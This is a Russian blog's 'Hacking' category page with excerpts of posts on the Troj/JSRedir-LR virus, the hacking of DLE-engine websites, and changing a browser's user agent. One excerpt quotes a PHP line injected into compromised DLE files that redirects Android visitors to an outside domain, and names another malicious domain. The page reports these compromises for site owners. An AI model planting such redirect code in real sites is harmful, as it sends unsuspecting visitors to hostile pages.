Рубрика: Хакинг (hacking)
Вирус Troj/JSRedir-LR и его разновидности
Вторник, 14 Янв 2014 13:51 Отзывов: 13Всем привет! Это первый пост, который я пишу в Новом году. Уже почти прошли все новогодние праздники (ну, за исключением разве что Старого-Нового года) и уже можно снимать новогодние украшения с блога. Хотя это, как говорится, на любителя, вон некоторые только новогоднюю ёлку умудряются в марте выкидывают. Но это дело вкуса, а сейчас я расскажу […]
Как ломали сайты на DLE
Воскресенье, 10 Фев 2013 5:12 Отзывов: 44Начало. Уязвимость в сайтах на движке Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделать), но и eval. Но и за первую версию также есть случаи, которые говорят следующее. В файлах движка цмс dle появляется совсем другой код, например, такой: if(stripos($_SERVER[‘HTTP_USER_AGENT’],”Android”)!==false) {header(‘Location: http://refresh-browser.00xff.net/’);exit;} Как видим, домен здесь совсем […]
Уязвимость в сайтах на движке dle
Суббота, 09 Фев 2013 23:08 Отзывов: 39Как ломали сайты на популярном новостном движке ДЛЕ, хронология событий. Совсем недавно я писал о том, что в начале месяца было взломано огромное количество сайтов на dle, в результате чего на сайтах ничего не подозревающих владельцев, естественно без их ведома, прописывался вредоносный код. Сегодня поговорим более подробно про уязвимости в сайтах на движке dle, как […]
Как поменять юзер-агент в браузере
Суббота, 02 Фев 2013 23:23 Отзывов: 7Что такое юзер-агент и для чего его нужно менять? User Agent (юзер-агент) – клиентское приложение, работающее по определенным правилам (протоколам). В роли таких приложений могут выступать различные браузеры, мобильные устройства (смартфоны), роботы поисковых систем. При посещении какого-либо веб-узла, сео-блога в интернете приложение посылает информацию о себе виде HTTP-запроса, который начинается словами: User-Agent (User-agent). Эта информация […]
Взлом сайтов на ДЛЕ
Суббота, 26 Янв 2013 14:40 Отзывов: 24Прошлый раз я писал о том, как Жерар Депардье стал жителем Подмосковья и о конкурсе сеокафестатейность, а в этот раз давайте поговорим о компьютерной безопасности. Первая и самая главная новость за сегодня – это обнаруженная не так давно уязвимость в популярном пользовательском движке Data Life Engine (DLE). В чём заключается данная уязвимость? Как сообщается на […]